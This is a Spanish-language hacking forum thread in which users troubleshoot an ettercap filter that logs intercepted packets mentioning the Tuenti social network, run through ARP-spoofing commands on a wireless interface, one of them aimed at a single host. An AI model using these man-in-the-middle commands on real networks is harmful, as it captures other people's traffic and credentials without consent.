Foro de elhacker.net

Seguridad Informática => Hacking Ético => Mensaje iniciado por: Fastolfe en 25 Diciembre 2011, 19:04 pm



Título: Problema con filtro en ettercap
Publicado por: Fastolfe en 25 Diciembre 2011, 19:04 pm
Buenas, el filtro es el siguiente:

if (search(DATA.data,"tuenti")){
log(DATA.data, "/tmp/log.log");
}

Lo compilo con "etterfilter f2 -o filtro", se compila correctamente:

 12 protocol tables loaded:
   DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

 11 constants loaded:
   VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

 Parsing source file 'f2'  done.

 Unfolding the meta-tree  done.

 Converting labels to real offsets  done.

 Writing output to 'filtro'  done.

 -> Script encoded into 4 instructions.

Pero al poner el ettercap (ettercap -t -f filtro -M arp:remote // -i wlan0) me sale:
TARGET (filtro) contains invalid chars !

Alguien sabe que falla?

Gracias de antemano!! =)


Título: Re: Problema con filtro en ettercap
Publicado por: vlaxys en 29 Diciembre 2011, 19:32 pm
Hola espero esto te sirva, yo de esta manera compilo los filtros, en tu caso seria asi:
etterfilter f2 -o filtro.ef

y lo ejecuto de la siguiente manera

ettercap -Tq -f filtro.ef -M -iwlan0 arp:remote //  //

tambie te recomiendo que para no generar mucho trafico solo apliques el ataque para un solos equipo ejemplo:

ettercap -Tq -f filtro.ef -M -iwlan0 arp:remote /192.168.1.8/ //
__________________________________________________________________________________



Título: Re: Problema con filtro en ettercap
Publicado por: Fastolfe en 31 Diciembre 2011, 20:35 pm
Gracias por la ayuda vlaxys =) Pero ahora el fallo es:

Listening on wlan0...
ERROR : 16, Device or resource busy
[ec_capture.c:capture_init:171]

La cuestión es que cuando quito la opcion -f funciona, no lo entiendo...


Título: Re: Problema con filtro en ettercap
Publicado por: alpha015 en 2 Enero 2012, 00:16 am
Buff, ettercap da muchos problemas, te recomiendo que te pases a wireshark, te dejo un manual:

http://cert.inteco.es/cert/Notas_Actualidad/informe_sobre_analisis_trafico_wireshark_20110211?postAction=getLatestInfo

Saludos


Título: Re: Problema con filtro en ettercap
Publicado por: Fastolfe en 2 Enero 2012, 16:53 pm
Gracias por la recomendación alpha015, le echo un vistazo y te comento! =)


Título: Re: Problema con filtro en ettercap
Publicado por: Fastolfe en 4 Enero 2012, 06:23 am
Las 18 páginas que llevo están bien. nunca está de más "repasar", asi que gracias de nuevo alpha015!!

He descubierto el error... y no podría ser más ridículo... 'F' en lugar de 'f'...